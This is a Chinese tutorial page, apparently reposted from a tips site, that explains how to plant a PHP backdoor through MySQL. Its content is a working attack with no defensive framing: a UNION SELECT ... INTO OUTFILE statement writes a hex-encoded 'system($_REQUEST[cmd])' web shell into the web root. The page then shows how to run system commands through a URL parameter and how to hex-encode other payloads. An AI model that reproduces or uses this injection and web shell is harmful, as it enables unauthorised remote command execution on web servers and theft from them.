通过Mysql的语句生成后门木马的方法

pianbrhuan

pianbrhuan

2016-01-29 15:05

通过Mysql的语句生成后门木马的方法,通过Mysql的语句生成后门木马的方法
 

通过Mysql 的语句生成后门木马的方法!

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/mysql/)

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?

再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/mysql/)

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是<?php system($_REQUEST[cmd]);?的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

 
展开更多 50%)
分享

猜你喜欢

通过Mysql的语句生成后门木马的方法

MySQL mysql数据库
通过Mysql的语句生成后门木马的方法

MySQL 通过索引优化含ORDER BY的语句

编程语言 网络编程
MySQL 通过索引优化含ORDER BY的语句

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

通过SQLServer 2008 操作 MySQL的方法

编程语言 网络编程
通过SQLServer 2008 操作 MySQL的方法

通过mysql show processlist 命令检查mysql锁的方法

编程语言 网络编程
通过mysql show processlist 命令检查mysql锁的方法

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

mysql中的替换语句

MySQL mysql数据库
mysql中的替换语句

不能通过mysql.sock连接MySQL问题的方法

编程语言 网络编程
不能通过mysql.sock连接MySQL问题的方法

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

《全民三国》新手入门引导

《全民三国》新手入门引导

《影之刃》轻羽角色培养及PVP高手心得

《影之刃》轻羽角色培养及PVP高手心得
下拉加载更多内容 ↓